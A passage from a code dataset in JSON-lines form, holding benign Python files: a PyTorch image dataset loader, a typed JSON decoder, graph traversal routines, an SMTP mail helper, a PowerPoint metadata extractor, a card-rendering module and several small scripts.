img_aug = Image.fromarray(self.X_train_no_blank[im], mode='F')\r\n target_aug = Image.fromarray(self.y_train_no_blank[im], mode='L')\r\n img2, target2 = self.joint_transform_train(img_aug, target_aug)\r\n img2 = np.array(img2)\r\n img2 = np.expand_dims(img2, 0)\r\n target2 = np.array(target2)\r\n target2 = np.expand_dims(target2, 0)\r\n img_aug_arr = np.concatenate((img_aug_arr, img2), axis=0)\r\n target_aug_arr = np.concatenate((target_aug_arr, target2), axis=0)\r\n # self.X_train = np.concatenate((self.X_train, img_aug_arr), axis=0)\r\n # self.y_train = np.concatenate((self.y_train, target_aug_arr), axis=0)\r\n self.X_train = img_aug_arr\r\n self.y_train = target_aug_arr\r\n # self.y_train = np.array(self.y_train == 1).astypy('int64')\r\n self.size = self.X_train.shape[0]\r\n print('train set size is: ',self.size)\r\n elif mode == 'val':\r\n self.X_val, self.y_val = load_val_data(data_path)\r\n self.size = self.X_val.shape[0]\r\n elif mode == 'test':\r\n self.X_test, self.x_slice_array = load_test_data(data_path)\r\n self.size = self.X_test.shape[0]\r\n\r\n def __getitem__(self, index):\r\n # 1. the image already crop\r\n if self.mode == \"train\":\r\n img, target = self.X_train[index], self.y_train[index]\r\n elif self.mode == 'val':\r\n img, target = self.X_val[index], self.y_val[index]\r\n #img, target = self.X_val[index], self.validfilelist\r\n elif self.mode == 'test': # the test target indicate the number of slice for each case\r\n img, target = self.X_test[index], self.test_file_list\r\n img = Image.fromarray(img, mode='F')\r\n #target = np.array(target, dtype=np.float32)\r\n\r\n if self.mode == 'train':\r\n target = Image.fromarray(target, mode='L')\r\n # 2. do joint transform\r\n if self.joint_transform_train is not None:\r\n # img, target = self.joint_transform(img, target)\r\n img = np.array(img)\r\n target = np.array(target)\r\n # 3. to tensor\r\n img = torch.from_numpy(img)\r\n target = torch.from_numpy(target)\r\n elif self.mode == 'val':\r\n # target = Image.fromarray(target, mode='L')\r\n target = Image.fromarray(target, mode='L')\r\n # img,target = self.joint_transform_valid(img, target)\r\n img = np.array(img)\r\n target = np.array(target)\r\n img = torch.from_numpy(img)\r\n target = torch.from_numpy(target)\r\n else:\r\n # 3. img to tensor\r\n # img = tf.to_tensor(img)\r\n img = torch.from_numpy(img)\r\n\r\n\r\n img = img.type(torch.FloatTensor)\r\n target = target.type(torch.FloatTensor)\r\n # 4. normalize for img\r\n if self.img_normalize != None:\r\n img = self.img_normalize(img)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n return self.size\r\n\r\nimport torch.utils.data as data\r\n\r\n# if __name__ == '__main__':\r\n# root = r'E:\\anyDataset\\PROMISE2012'\r\n# data_path = r'E:\\anyDataset\\PROMISE2012\\npy_image'\r\n# CROP_SIZE = 256\r\n# data_to_array(root, data_path, CROP_SIZE, CROP_SIZE)\r\n","sub_path":"dataset/sliver07_dataset.py","file_name":"sliver07_dataset.py","file_ext":"py","file_size_in_byte":17476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237517813","text":"\"\"\" Decoding utilities \"\"\"\n\nfrom typing import Any, Union\nfrom collections import deque, OrderedDict\nfrom collections.abc import Mapping\nfrom typing_extensions import Literal\nfrom typing_json.typechecking import is_instance, is_namedtuple\nfrom typing_json.encoding import JSON_BASE_TYPES, is_json_encodable\n\n_UNREACHABLE_ERROR_MSG = \"Should never reach this point, please open an issue on GitHub.\"\n\ndef from_json_obj(obj: Any, t: Any) -> Any:\n \"\"\" Converts an object of json standard type to json encodable type. \"\"\"\n # pylint:disable=invalid-name,too-many-branches,too-many-statements,too-many-return-statements\n if not is_json_encodable(t):\n raise TypeError(\"Type %s is not json-encodable.\"%str(t))\n if t in JSON_BASE_TYPES:\n if not isinstance(obj, t):\n raise TypeError(\"Object %s is not %s.\"%(str(obj), str(t)))\n return obj\n if t in (None, type(None)):\n if obj is not None:\n raise TypeError(\"Object %s is not null (t=%s).\"%(str(obj), str(t)))\n return None\n if t is ...:\n if obj is not None:\n raise TypeError(\"Object %s is not null (t=%s).\"%(str(obj), str(t)))\n return ...\n if is_namedtuple(t):\n if not isinstance(obj, (dict, OrderedDict, list)):\n raise TypeError(\"Object %s is not (ordered) dictionary or list (t=%s).\"%(str(obj), str(t))) # pylint:disable=line-too-long\n fields = getattr(t, \"_fields\")\n field_types = getattr(t, \"_field_types\")\n field_defaults = getattr(t, \"_field_defaults\")\n if isinstance(obj, list):\n if len(fields) != len(obj):\n raise TypeError(\"Object %s does not provide the right number of values for a namedtuple.\")\n return_val = t(*tuple(from_json_obj(obj[i] if i < len(obj) else field_defaults[field], field_types[field]) for i, field in enumerate(fields))) # pylint:disable=line-too-long\n assert is_instance(return_val, t)\n return return_val\n converted_dict: OrderedDict() = {} # type:ignore\n if set(obj.keys()).union(set(field_defaults.keys())) != set(field_types.keys()):\n key_diff = set(obj.keys()).union(set(field_defaults.keys())) - set(field_types.keys())\n if key_diff:\n raise TypeError(\"Object %s does not have the required keys: t=%s, extra keys %s.\"%(str(obj), str(t), str(key_diff))) # pylint:disable=line-too-long\n key_diff = set(field_types.keys()) - set(obj.keys()).union(set(field_defaults.keys()))\n raise TypeError(\"Object %s does not have the required keys: t=%s, missing keys %s.\"%(str(obj), str(t), str(key_diff))) # pylint:disable=line-too-long\n for field in fields:\n field_type = field_types[field]\n if not field in obj:\n converted_dict[field] = field_defaults[field]\n else:\n converted_dict[field] = from_json_obj(obj[field], field_type)\n return_val = t(**converted_dict)\n assert is_instance(return_val, t)\n return return_val\n if hasattr(t, \"__origin__\") and hasattr(t, \"__args__\"): # generics\n if t.__origin__ is Union:\n for s in t.__args__:\n try:\n return_val = from_json_obj(obj, s)\n assert is_instance(return_val, t)\n return return_val\n except TypeError:\n continue\n raise TypeError(\"Object %s is not convertible to any of %s.\"%(str(obj), str(t)))\n if t.__origin__ is Literal:\n if not is_instance(obj, t):\n raise TypeError(\"Object %s is not allowed (t=%s).\"%(str(obj), str(t)))\n return obj\n if t.__origin__ is list:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = list(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is deque:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = deque(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is set:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = set(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is frozenset:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = frozenset(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is tuple:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n if len(t.__args__) == 2 and t.__args__[1] is ...: # pylint:disable=no-else-return\n return_val = tuple(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n else:\n if len(obj) != len(t.__args__):\n raise TypeError(\"List %s is of incorrect length (t=%s).\"%(str(obj), str(t)))\n return_val = tuple(from_json_obj(x, t.__args__[i]) for i, x in enumerate(obj))\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ in (dict, Mapping):\n if not isinstance(obj, (dict, OrderedDict)):\n raise TypeError(\"Object %s is not dict or OrderedDict (t=%s).\"%(str(obj), str(t)))\n converted_dict = dict() # type:ignore\n for field in obj:\n if not isinstance(field, str):\n raise TypeError(\"Object key %s is string (t=%s).\"%(field, str(t)))\n converted_dict[field] = from_json_obj(obj[field], t.__args__[1])\n assert is_instance(converted_dict, t)\n return converted_dict\n if t.__origin__ is OrderedDict:\n if not isinstance(obj, OrderedDict):\n raise TypeError(\"Object %s is not dict or OrderedDict (t=%s).\"%(str(obj), str(t)))\n converted_dict = OrderedDict() # type:ignore\n for field in obj:\n if not isinstance(field, str):\n raise TypeError(\"Object key %s is string (t=%s).\"%(field, str(t)))\n converted_dict[field] = from_json_obj(obj[field], t.__args__[1])\n assert is_instance(converted_dict, t)\n return converted_dict\n raise AssertionError(_UNREACHABLE_ERROR_MSG) # pragma: no cover\n","sub_path":"typing_json/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560970325","text":"class Solution:\r\n def myPow(self, x: float, n: int):\r\n ans, base, positive = 1, x, True if n > 0 else False\r\n n = abs(n)\r\n while n > 0:\r\n if n%2 == 1:\r\n ans *= base\r\n base *= base\r\n n = n//2\r\n return ans if positive else 1/ans","sub_path":"50_pow(x,n).py","file_name":"50_pow(x,n).py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643409268","text":"#!/usr/bin/env python\n#\n# Copyright 2015-present Facebook. All Rights Reserved.\n#\n# This program file is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; version 2 of the License.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n# for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program in a file named COPYING; if not, write to the\n# Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor,\n# Boston, MA 02110-1301 USA\n#\nfrom typing import Any, Dict, Optional\n\nfrom node import node\nfrom rest_pal_legacy import *\n\n\nclass spbNode(node):\n def __init__(self, info=None, actions=None):\n if info == None:\n self.info = {}\n else:\n self.info = info\n\n if actions == None:\n self.actions = []\n else:\n self.actions = actions\n\n async def doAction(self, data, param: Optional[Dict[Any, Any]] = None):\n if pal_sled_action(data[\"action\"]) == -1:\n res = \"failure\"\n else:\n res = \"success\"\n\n result = {\"result\": res}\n\n return result\n\n\ndef get_node_spb():\n name = pal_get_platform_name()\n info = {\"Description\": name + \" Side Plane\"}\n actions = [\"sled-cycle\", \"sled-identify-on\", \"sled-identify-off\"]\n return spbNode(info, actions)\n","sub_path":"common/recipes-rest/rest-api/files/node_spb.py","file_name":"node_spb.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173286281","text":"import turtle\r\nimport math\r\n\r\ndef crcl(R, k):\r\n for i in range(360):\r\n turtle.forward(math.pi * (R/180))\r\n if k == 0:\r\n turtle.left(1)\r\n else:\r\n turtle.right(1)\r\n\r\nturtle.shape('turtle')\r\nturtle.speed(0)\r\nturtle.left(90)\r\nfor R in range(50, 100, 10):\r\n crcl(R, 0)\r\n crcl(R, 1)\r\nturtle.exitonclick()\r\n","sub_path":"turtle1/n11.py","file_name":"n11.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411851537","text":"from totalimpactwebapp import db\nfrom totalimpactwebapp import util\nimport datetime\nimport jinja2\n\n\n\nclass Card(object):\n\n def __init__(self, **kwargs):\n if not \"timestamp\" in kwargs:\n self.timestamp = kwargs[\"timestamp\"]\n else:\n self.timestamp = datetime.datetime.utcnow()\n\n\n @classmethod\n def would_generate_a_card(self):\n raise NotImplementedError\n\n def get_template_name(self):\n raise NotImplementedError\n\n @property\n def card_type(self):\n return type(self).__name__\n\n\n @property\n def sort_by(self):\n score = 0\n\n if self.milestone_awarded == 1:\n score += 500 # as good as a 75th percentile\n\n if self.milestone_awarded > 1:\n score += (self.milestone_awarded + 500)\n\n if \"youtube\"==self.provider:\n score += 1000\n elif \"wikipedia\"==self.provider:\n score += 10000\n\n return score\n\n\n def to_html(self):\n templateLoader = jinja2.FileSystemLoader(searchpath=\"totalimpactwebapp/templates\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n html_template = templateEnv.get_template(self.get_template_name() + \".html\")\n return html_template.render({\"card\": self})\n\n def to_text(self):\n templateLoader = jinja2.FileSystemLoader(searchpath=\"totalimpactwebapp/templates\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n html_template = templateEnv.get_template(self.get_template_name() + \".txt\")\n return html_template.render(self)\n\n def to_dict(self):\n # ignore some properties to keep dict small. \n properties_to_ignore = [\"profile\", \"product\"]\n ret = util.dict_from_dir(self, properties_to_ignore)\n\n # individual cards can add in more subelements to help with debugging\n ret[\"url_slug\"] = self.profile.url_slug\n\n return ret\n\n\n\nclass ProductNewMetricCard(Card):\n\n def __init__(self, profile, product, metric, timestamp=None):\n self.product = product\n self.profile = profile\n self.metric = metric\n super(ProductNewMetricCard, self).__init__(timestamp=timestamp)\n\n @classmethod\n def would_generate_a_card(cls, metric):\n # a milestone can be awarded if the previous value was 0, \n # which would mean there is no diff_value\n return metric.diff_value > 0\n\n @property\n def num_profile_products_this_good(self):\n ret = 0\n for product in self.profile.products_not_removed:\n\n if product.has_metric_this_good(\n self.metric.provider,\n self.metric.interaction,\n self.metric.display_count):\n ret += 1\n return ret\n\n @property\n def num_profile_products_this_good_ordinal(self):\n return util.ordinal(self.num_profile_products_this_good)\n\n @property\n def milestone_awarded(self):\n return self.metric.milestone_just_reached\n\n @property\n def provider(self):\n return self.metric.provider\n\n @property\n def sort_by(self):\n score = super(ProductNewMetricCard, self).sort_by\n\n if self.metric.percentile and self.metric.percentile[\"value\"] > 50:\n top_half = self.metric.percentile[\"value\"] - 50\n score += (top_half * 10) # max 500\n\n try:\n if \"plos\"==self.metric.provider or \"slideshare\"==self.metric.provider:\n score += int(self.metric.diff_value)\n elif \"scopus\"==self.metric.provider:\n score += (int(self.metric.diff_value) * 100)\n else:\n score += (int(self.metric.diff_value) * 10)\n except TypeError:\n # no diff value because is first metric card\n pass\n\n return score\n\n\n def get_template_name(self):\n return \"card-product\"\n\n def to_dict(self):\n mydict = super(ProductNewMetricCard, self).to_dict()\n mydict.update({\n \"tiid\": self.product.tiid,\n })\n return mydict\n\n\n\n\n\n\n\nclass ProfileNewMetricCard(Card):\n\n def __init__(self, profile, provider, interaction, timestamp=None):\n self.profile = profile\n self.provider = provider\n self.interaction = interaction\n\n # this card doesn't have a solo metric object, but it helps to \n # save an exemplar metric so that it can be used to access relevant display properies\n self.exemplar_metric = profile.get_metrics_by_name(provider, interaction)[0] #exemplar metric \n super(ProfileNewMetricCard, self).__init__(timestamp=timestamp)\n\n\n @classmethod\n def would_generate_a_card(cls, profile, provider, interaction):\n return profile.metric_milestone_just_reached(provider, interaction) is not None\n\n @property\n def milestone_awarded(self):\n try:\n return self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"milestone\"]\n except KeyError:\n return None\n\n @property\n def current_value(self):\n try:\n return self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"accumulated_diff_end_value\"]\n except KeyError:\n return None\n\n @property\n def diff_value(self):\n try:\n return self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"accumulated_diff\"]\n except KeyError:\n return None \n\n @property\n def sort_by(self):\n score = super(ProfileNewMetricCard, self).sort_by\n return score + 1000\n\n def get_template_name(self):\n return \"card-profile\"\n\n\n def to_dict(self):\n # ignore some properties to keep dict small. \n properties_to_ignore = [\"profile\", \"exemplar_metric\"]\n ret = util.dict_from_dir(self, properties_to_ignore)\n\n # add to help with debugging\n ret[\"url_slug\"] = self.profile.url_slug\n\n return ret\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"totalimpactwebapp/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180167856","text":"import matplotlib.pyplot as plt\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot = True)\nbatch_xs, batch_ys = mnist.train.next_batch(100) \n\nrows = 3\ncols = 5\ncount = rows*cols\nfig, ax = plt.subplots(nrows=rows, ncols=cols, sharex=True, sharey=True,)\nax = ax.flatten()\n\nfor i in range(count):\n img = batch_xs[i].reshape(28, 28)\n ax[i].imshow(img, interpolation='nearest')\n #ax[i].imshow(img, cmap='Greys', interpolation='nearest')\n\nax[0].set_xticks([])\nax[0].set_yticks([])\nplt.tight_layout()\n\n# plt.savefig('mnist_figures.png', dpi=300)\nplt.show()\n\n","sub_path":"ch06_CNN/ch0602_ans/show-grid-images.py","file_name":"show-grid-images.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283956528","text":"\"\"\"\nSimple graph implementation\n\"\"\"\n\n\nclass Queue:\n def __init__(self):\n self.queue = []\n def enqueue(self, value):\n self.queue.append(value)\n def dequeue(self):\n if self.size() > 0:\n return self.queue.pop(0)\n else:\n return None\n def size(self):\n return len(self.queue)\n\nclass Stack:\n def __init__(self):\n self.stack = []\n def push(self, value):\n self.stack.append(value)\n def pop(self):\n if self.size() > 0:\n return self.stack.pop()\n else:\n return None\n def size(self):\n return len(self.stack)\n\n\nclass Graph:\n \"\"\"Represent a graph as a dictionary of vertices mapping labels to edges.\"\"\"\n def __init__(self):\n self.vertices = {} # initialize an empty dictionary of vertices\n def add_vertex(self, vertex_id):\n self.vertices[vertex_id] = Vertex(vertex_id) # key to be vertex_id and value to be Vertex\n def add_edge(self, v1, v2): # undirected graph\n if v1 in self.vertices and v2 in self.vertices: # if v1 and v2 both exist in the vertex list \n self.vertices[v1].edges.add(v2)\n self.vertices[v2].edges.add(v1)\n else:\n raise IndexError('Vertex not found')\n def add_directed_edge(self, v1, v2):\n if v1 in self.vertices and v2 in self.vertices:\n self.vertices[v1].edges.add(v2)\n else:\n raise IndexError('Vertex not found')\n\n def bft(self, starting_node):\n # create an empty Queue\n q = Queue()\n # create an empty visited list\n visited = set()\n # add the start node to the queue\n q.enqueue(starting_node)\n # while the Queue is not empty...\n while q.size() > 0:\n # remove the first node from the Queue\n node = q.dequeue()\n # check if node is visited\n if node not in visited:\n # if not, mark node as visited\n print(node)\n visited.add(node)\n # print(self.vertices[node].edges)\n # then put all its children in the queue\n for child in self.vertices[node].edges:\n # if child not in visited:\n q.enqueue(child)\n\n def dft(self, starting_node):\n # create an empty Stack\n s = Stack()\n # create an empty visited list\n visited = set()\n # add the start node to the stack\n s.push(starting_node)\n # while the Stack is not empty...\n while s.size() > 0:\n # remove the first node from the Stack\n node = s.pop()\n # if it hasn't been visited\n if node not in visited:\n # mark it as visited\n print(node)\n visited.add(node)\n # then put all its children in the Stack\n for child in self.vertices[node].edges:\n s.push(child)\n \n # mark the starting node as visited,\n # then for each unvisited child,\n # call dft_r on that child\n def dft_r(self, starting_node, visited = None):\n if visited is None:\n visited = set()\n # mark starting_node as visited\n print(starting_node)\n visited.add(starting_node)\n for child in self.vertices[starting_node].edges:\n # for each unvisited child...\n if child not in visited:\n # ...call dft_r on that child\n self.dft_r(child, visited)\n\n def bfs(self, starting_node, destination_node):\n # create an empty Queue\n q = Queue()\n # create an empty visited list\n visited = set()\n # add the initial path to the queue\n q.enqueue([starting_node])\n # while the Queue is not empty...\n while q.size() > 0:\n # remove the first path from the Queue\n path = q.dequeue()\n # if last node in the path has not been visited\n if path[-1] not in visited:\n # mark it as visited\n if destination_node == path[-1]:\n return path\n visited.add(path[-1])\n # then put the path to all its children in the queue\n for child in self.vertices[path[-1]].edges:\n new_path = list(path) # copying the list otherwise we're going to be using the same instance of list and adding multiple times to it, which will not work\n new_path.append(child)\n q.enqueue(new_path)\n return None\n\n def dfs(self, starting_node, destination_node):\n # create an empty Stack\n s = Stack()\n # create an empty visited list\n visited = set()\n # add the initial path to the stack\n s.push([starting_node])\n # while the Stack is not empty...\n while s.size() > 0:\n # remove the first path from the Stack\n path = s.pop()\n # if last node in the path has not been visited\n if path[-1] not in visited:\n # mark it as visited\n if destination_node == path[-1]:\n return path\n visited.add(path[-1])\n # then put the path to all its children in the stack\n for child in self.vertices[path[-1]].edges:\n new_path = list(path)\n new_path.append(child)\n s.push(new_path)\n return None\n\n\nclass Vertex:\n def __init__(self, vertex_id):\n self.id = vertex_id\n self.edges = set()\n\n\n\n# Graphs I day 1 - https://www.youtube.com/watch?v=qWQORVXLXgE\n# Graphs I day 2 - https://www.youtube.com/watch?v=erlKh2fGPYI\n# Graphs II day 1 - https://www.youtube.com/watch?v=yj2dOI67ewk\n# Graphs II day 2 - https://youtu.be/OiI5HUHWbQU","sub_path":"projects/graph/src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193798422","text":"class Request(object):\n def __init__(self, timestamp, user=None, category=None, service=None, complain=None):\n self.timestamp = timestamp\n self.user = user\n self.category = category\n self.service = service\n self.complain = complain\n\n @staticmethod\n def get_request_json(obj):\n \"\"\"\n Create a pickled json object\n :param obj: Request object to be pickled.\n :return: Encoded pickled string. \n \"\"\"\n if isinstance(obj, Request):\n import jsonpickle\n return jsonpickle.encode(obj, unpicklable=True)\n raise TypeError\n\n\nif __name__ == '__main__':\n\n from api.json.json_model import Auth, Category, Service, Complain\n authObj = Auth(auth_code = 'ccf6cebd53549f1d74a82bb455d907648fa28d0c',\n phone_number = 9780044091,\n serial_number = 'JLIU897978F',\n name = None,\n email = None)\n categoryObj = Category(category_id = 5467)\n serviceObj = Service(service_id=1234)\n complainObj = Complain(address = 'A-98',\n message = 'Repair my arse',\n service_status = '0',\n timestamp = '98276998983',\n complain_phone_number = None)\n import datetime\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%Y_%H_%M_%S_%f\")\n RequestObj = Request(timestamp=timestamp, auth=authObj, category=categoryObj, service=serviceObj, complain=complainObj)\n print(Request.get_request_json(RequestObj))","sub_path":"api/json/json_request.py","file_name":"json_request.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538468303","text":"#!/usr/bin/env python\n\n# Copyright (C) 2013-2015 A. Eijkhoudt and others\n\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# TABLE: title:LONGTEXT, created_by:LONGTEXT, modified_by:LONGTEXT, revision:INT, creation_date:LONGTEXT, modify_date:LONGTEXT, total_length: FLOAT, total_words:INT, application:LONGTEXT, pp_format:LONGTEXT, paragraphs:INT, slides:INT, notes:INT, hidden_slides:INT, videos:INT, company:LONGTEXT, shared:LONGTEXT, version:FLOAT, content:LONGTEXT\n\nimport xml.etree.ElementTree as ET\nimport re\nimport zipfile\nimport sys\nimport pptx\n\n\ndef process(file, config, rcontext, columns=None):\n fullpath = file.fullpath\n try:\n document = zipfile.ZipFile(fullpath)\n except:\n return None\n\n # document core, ie. keywords/title/subject and mod+creation dates\n try:\n xmlprop = document.read(\"docProps/core.xml\")\n except:\n # Not a valid pptx file\n return None\n\n # data regarding ammount of pages/words. Also contains app version and OS.\n xmlapp = document.read(\"docProps/app.xml\")\n\n # Minidom alternative\n tree = ET.fromstring(xmlprop)\n tree_app = ET.fromstring(xmlapp)\n\n #### Just some data, might be usefull lat0r ####\n data_tree = []\n data_app = []\n\n# \tfor basic in range(6):\n# \t\tdata_tree.append(tree[basic].text)\n\n# \tfor app in range(17):\n# \t\tdata_app.append(tree_app[app].text)\n\n\n data_tree.append(tree[0].text)\n data_tree.append(tree[1].text)\n data_tree.append(tree[2].text)\n data_tree.append(tree[3].text)\n data_tree.append(tree[4].text)\n data_tree.append(tree[5].text)\n\n data_app.append(tree_app[0].text)\n data_app.append(tree_app[1].text)\n data_app.append(tree_app[2].text)\n data_app.append(tree_app[3].text)\n data_app.append(tree_app[4].text)\n data_app.append(tree_app[5].text)\n data_app.append(tree_app[6].text)\n data_app.append(tree_app[7].text)\n data_app.append(tree_app[8].text)\n data_app.append(tree_app[12].text)\n data_app.append(tree_app[14].text)\n data_app.append(tree_app[15].text)\n\n\n textlist = []\n powerpoints = pptx.Presentation(fullpath)\n slidenum = 1\n for slide in powerpoints.slides:\n for shape in slide.shapes:\n if not shape.has_textframe:\n continue\n for paragraph in shape.textframe.paragraphs:\n for run in paragraph.runs:\n if not any(d.get('Slide', None) == slidenum for d in textlist):\n textlist.append({\"Slide\": slidenum, \"Content\": [run.text]})\n else:\n for val in textlist:\n if val[\"Slide\"] == slidenum:\n val[\"Content\"].append(run.text)\n slidenum += 1\n\n merged = data_tree + data_app + textlist\n return merged\n\n\n# \ttitle = tree[0].text\n# \tcreated = tree[1].text\n# \tlastmod = tree[2].text\n# \trevision = tree[3].text\n# \tmadeon = tree[4].text\n# \tchangedon = tree[5].text\n\n# \ttime = tree_app[0].text\n# \twords = tree_app[1].text\n# \tapplication = tree_app[2].text\n# \tppFormat = tree_app[3].text\n# \tparagraphs = tree_app[4].text\n# \tslides = tree_app[5].text\n# \tnotes = tree_app[6].text\n# \thiddenslides = tree_app[7].text\n# \tmultimediaclips = tree_app[8].text\n# \tcompany = tree_app[12].text\n# \tshared = tree_app[14].text\n# \tversion = tree_app[16].text\n","sub_path":"source/modules/application/vnd.ms-powerpoint/pptx.py","file_name":"pptx.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206796185","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport mail_conf as settings\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate\nfrom email.utils import formataddr\nfrom email.header import Header\n\ndef send_mail(title, text):\n # メールを送る\n to = settings.MAIL_TO\n subject = title\n send_via_gmail(to, subject, text)\n\ndef send_via_gmail(to, subject, text):\n # smtpにてメール送信\n from_addr = settings.MAIL_FROM\n message = create_message(to, from_addr, subject, text)\n smtp = smtplib.SMTP(settings.MAIL_HOST, settings.MAIL_PORT)\n smtp.ehlo()\n smtp.starttls()\n smtp.ehlo()\n smtp.login(from_addr, settings.MAIL_PASS)\n smtp.sendmail(from_addr, [to], message.as_string())\n smtp.close()\n\ndef create_message(to, from_addr, subject, body):\n # メッセージをエンコードして返す\n encoding = 'utf-8'\n sender_name = Header(from_addr, encoding).encode()\n recipient_name = Header(from_addr, encoding).encode()\n message = MIMEText(body.encode(encoding), 'plain', _charset=encoding)\n message['Subject'] = Header(subject, encoding )\n message['From'] = formataddr((sender_name, from_addr))\n message['To'] = formataddr((recipient_name, to))\n message['Date'] = formatdate()\n return message\n\nif __name__ == '__main__':\n args = sys.argv\n send_mail(args[1], args[2])\n\n","sub_path":"api/mail/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252528332","text":"\"\"\"To plot door open percentage comparison\n\n \"\"\"\n# pylint: disable=no-member\nfrom datetime import time, timedelta, datetime\nimport matplotlib.ticker as mtick\nimport matplotlib.pyplot as plt\nimport itertools\nimport seaborn as sns\nimport pandas as pd\nfrom classes.weather import Weather\nfrom savepdf_tex import savepdf_tex\nimport pickle\nimport os\nimport numpy as np\nnp.set_printoptions(precision=3)\nimport util.util_funcs as uf\n\n\n\nif __name__ == '__main__':\n\n opening_method=['internal_doors_only_random']\n method=['DTMC']\n movement_method = ['change_rooms_in_group', None]\n contam_model_names = ['school_corridor']\n plot_time_series = False\n save=True\n wind_dir = [0.0, 90.0]\n wind_speeds = [5.0,15.0]\n door_opening_fraction = np.round(np.linspace(0.0, 1.0, 21), decimals=2)\n amb_temps = [5.0]\n corridor_temp = [19.0]\n classroom_temp = [21.0]\n window_height = [1.0]\n time_to_get_results = timedelta(days=4, hours=23, minutes=50)\n time_steps = [timedelta(minutes=10)]\n\n\n dtype_converters = {\n 'duration': lambda x: timedelta(days=datetime.strptime(x,\"%d days\").day),\n 'school_start': lambda x: datetime.strptime(x, '%H:%M:%S').time(),\n 'school_end': lambda x: datetime.strptime(x, '%H:%M:%S').time(),\n 'time_step': lambda x: timedelta(minutes=datetime.strptime(x,\"0 days %H:%M:%S\").minute),\n }\n\n model_log = pd.read_csv(f'{os.path.dirname(os.path.realpath(__file__))}/results/model_log.csv',\n index_col=0, converters=dtype_converters)\n runs_to_plot = ['movement_001_q5']#, 'movement_002_q10', 'movement_003_q25']\n models_to_plot = model_log[(model_log['run name'].isin(runs_to_plot))]\n\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n # fig2, ax2 = plt.subplots(1, 1, figsize=(12, 6))\n col_names = pd.MultiIndex.from_product([models_to_plot['quanta_gen_rate'].unique(),\n models_to_plot['wind_speed'].unique(),\n models_to_plot['ambient_temp'].unique(),\n models_to_plot['movement_method'].unique()],\n names=['quanta', 'wind speed', 'ambient temp.', 'movement_method'])\n df_plotting = pd.DataFrame(columns=col_names)\n print(f'Number of models to plot: {len(models_to_plot)}')\n for i, file in enumerate(models_to_plot.index):\n print(f'extracting data from model {i} of {len(models_to_plot)}', end='\\r')\n model = uf.load_model(\n file, loc=f'{os.path.dirname(os.path.realpath(__file__))}/results')\n \n speed = model.weather.wind_speed\n temp = model.weather.ambient_temp\n quanta = 